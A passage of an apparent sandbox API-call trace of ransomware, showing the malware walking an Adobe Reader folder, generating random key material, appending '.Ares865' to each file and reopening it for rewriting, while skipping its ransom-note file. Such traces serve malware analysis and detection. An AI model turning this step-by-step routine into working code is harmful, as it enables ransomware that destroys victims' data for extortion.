lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.417] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19456) returned 1 [0158.418] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.418] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.418] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.422] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.422] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.422] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.423] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="rum124.lex" | out: lpString1="rum124.lex") returned="rum124.lex" [0158.423] lstrlenW (lpString="rum124.lex") returned 10 [0158.423] lstrlenW (lpString="Ares865") returned 7 [0158.423] lstrcmpiW (lpString1="124.lex", lpString2="Ares865") returned -1 [0158.424] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum124.lex.Ares865") returned 106 [0158.424] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum124.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum124.lex"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum124.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum124.lex.ares865"), dwFlags=0x1) returned 1 [0158.426] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum124.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum124.lex.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.426] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=645120) returned 1 [0158.426] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.427] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.427] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.460] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.461] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.461] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.470] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="rum32.clx" | out: lpString1="rum32.clx") returned="rum32.clx" [0158.470] lstrlenW (lpString="rum32.clx") returned 9 [0158.470] lstrlenW (lpString="Ares865") returned 7 [0158.470] lstrcmpiW (lpString1="m32.clx", lpString2="Ares865") returned 1 [0158.470] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum32.clx.Ares865") returned 105 [0158.470] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum32.clx.ares865"), dwFlags=0x1) returned 1 [0158.473] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.473] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32759) returned 1 [0158.473] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.474] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.474] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.478] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.478] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.478] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.479] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="rumphon.env.Ares865" | out: lpString1="rumphon.env.Ares865") returned="rumphon.env.Ares865" [0158.479] lstrlenW (lpString="rumphon.env.Ares865") returned 19 [0158.479] lstrlenW (lpString="Ares865") returned 7 [0158.479] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0158.480] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7e05c960, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rus.fca", cAlternateFileName="")) returned 1 [0158.480] lstrcmpiW (lpString1="rus.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0158.480] lstrcmpiW (lpString1="rus.fca", lpString2="aoldtz.exe") returned 1 [0158.480] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="rus.fca" | out: lpString1="rus.fca") returned="rus.fca" [0158.480] lstrlenW (lpString="rus.fca") returned 7 [0158.480] lstrlenW (lpString="Ares865") returned 7 [0158.480] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.fca.Ares865") returned 103 [0158.480] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.fca.ares865"), dwFlags=0x1) returned 1 [0158.483] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.483] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=696) returned 1 [0158.483] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.484] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.484] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.486] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.487] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.487] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.487] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="rus.hyp" | out: lpString1="rus.hyp") returned="rus.hyp" [0158.488] lstrlenW (lpString="rus.hyp") returned 7 [0158.488] lstrlenW (lpString="Ares865") returned 7 [0158.488] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.hyp.Ares865") returned 103 [0158.488] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.hyp.ares865"), dwFlags=0x1) returned 1 [0158.491] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.491] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0158.491] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.492] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.492] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.496] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.496] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.496] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.497] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="rus101.hsp" | out: lpString1="rus101.hsp") returned="rus101.hsp" [0158.497] lstrlenW (lpString="rus101.hsp") returned 10 [0158.497] lstrlenW (lpString="Ares865") returned 7 [0158.497] lstrcmpiW (lpString1="101.hsp", lpString2="Ares865") returned -1 [0158.498] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus101.hsp.Ares865") returned 106 [0158.498] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus101.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus101.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus101.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus101.hsp.ares865"), dwFlags=0x1) returned 1 [0158.500] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus101.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus101.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.500] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=461522) returned 1 [0158.500] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.501] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.501] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.536] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.537] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.537] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.543] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="rus32.clx" | out: lpString1="rus32.clx") returned="rus32.clx" [0158.543] lstrlenW (lpString="rus32.clx") returned 9 [0158.543] lstrlenW (lpString="Ares865") returned 7 [0158.543] lstrcmpiW (lpString1="s32.clx", lpString2="Ares865") returned 1 [0158.544] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus32.clx.Ares865") returned 105 [0158.544] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus32.clx.ares865"), dwFlags=0x1) returned 1 [0158.546] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rus32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.546] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32805) returned 1 [0158.547] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.547] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.547] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.556] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.557] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.557] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.558] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="sgr.fca" | out: lpString1="sgr.fca") returned="sgr.fca" [0158.558] lstrlenW (lpString="sgr.fca") returned 7 [0158.558] lstrlenW (lpString="Ares865") returned 7 [0158.558] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.fca.Ares865") returned 103 [0158.558] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.fca.ares865"), dwFlags=0x1) returned 1 [0158.562] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.562] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1436) returned 1 [0158.563] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.563] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.563] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.566] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.567] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.567] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.568] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="sgr.hyp" | out: lpString1="sgr.hyp") returned="sgr.hyp" [0158.568] lstrlenW (lpString="sgr.hyp") returned 7 [0158.568] lstrlenW (lpString="Ares865") returned 7 [0158.568] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.hyp.Ares865") returned 103 [0158.568] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.hyp.ares865"), dwFlags=0x1) returned 1 [0158.572] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.572] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=50176) returned 1 [0158.572] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.573] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.573] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.580] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.581] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.581] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.582] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="sgr105.hsp" | out: lpString1="sgr105.hsp") returned="sgr105.hsp" [0158.582] lstrlenW (lpString="sgr105.hsp") returned 10 [0158.582] lstrlenW (lpString="Ares865") returned 7 [0158.582] lstrcmpiW (lpString1="105.hsp", lpString2="Ares865") returned -1 [0158.582] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr105.hsp.Ares865") returned 106 [0158.582] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr105.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr105.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr105.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr105.hsp.ares865"), dwFlags=0x1) returned 1 [0158.584] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr105.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr105.hsp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.585] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=761387) returned 1 [0158.585] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.586] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.586] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.621] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.622] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.622] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.641] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dedfba0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7ffe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sgr32.clx", cAlternateFileName="")) returned 1 [0158.641] lstrcmpiW (lpString1="sgr32.clx", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0158.641] lstrcmpiW (lpString1="sgr32.clx", lpString2="aoldtz.exe") returned 1 [0158.641] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="sgr32.clx" | out: lpString1="sgr32.clx") returned="sgr32.clx" [0158.641] lstrlenW (lpString="sgr32.clx") returned 9 [0158.641] lstrlenW (lpString="Ares865") returned 7 [0158.641] lstrcmpiW (lpString1="r32.clx", lpString2="Ares865") returned 1 [0158.642] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr32.clx.Ares865") returned 105 [0158.642] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr32.clx.ares865"), dwFlags=0x1) returned 1 [0158.648] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\sgr32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\sgr32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0158.648] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32766) returned 1 [0158.649] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0158.650] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0158.650] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.656] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0158.656] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0158.656] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0158.657] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="sgr96.ths" | out: lpString1="sgr96.ths") returned="sgr96.ths" [0158.657] lstrlenW 